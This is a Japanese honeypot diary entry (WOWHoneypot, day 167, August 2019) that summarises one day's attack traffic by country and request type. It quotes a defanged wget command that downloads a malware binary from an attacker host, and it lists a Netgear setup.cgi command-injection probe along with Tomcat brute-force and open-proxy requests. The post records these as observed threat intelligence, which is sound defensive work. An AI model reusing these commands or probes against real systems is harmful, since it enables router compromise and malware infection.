23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(167日目)

2019/08/30(金)

トータルは654件でした。

ハンティングログは以下です。

211.193.211[.]96 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com

IPのロケーション別の件数は以下です。

スイス 405
中国 197
アメリ 10
イギリス 5
フランス 3
ブラジル 3
イタリア 3
インドネシア 2
韓国 2
香港 2
シンガポール 2
スペイン 2
ポーランド 2
ウクライナ 2
トルコ 2
ギリシャ 1
エストニア 1
ナイジェリア 1
グルジア 1
ロシア 1
エクアドル 1
イラン 1
ロッコ 1
チェコ 1
オランダ 1
アルゼンチン 1
インド 1

f:id:sec23:20190901141625p:plain

件数 概要 リクエス
596 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
39 アクセス GET /
5 WordPressの調査 GET /wp-admin/
3 phpMyAdminの調査 GET /admin-scripts.asp
2 不正中継の調査 HEAD hxxp[:]//123.125.114[.]144/
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 不正中継の調査 GET hxxp[:]//www[.]ip[.]cn/
1 不正中継の調査 GET hxxp[:]//www[.]123cha[.]com/
1 不正中継の調査 GET hxxp[:]//httpheader[.]net/
1 不正中継の調査 GET hxxp[:]//boxun[.]com/
1 DGN1000 Netgear ルータの調査 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
1 WebShell設置の調査? GET /agentui.php/
1 不正中継の試み CONNECT www[.]baidu[.]com:443
1 不正中継の試み CONNECT cn[.]bing[.]com:443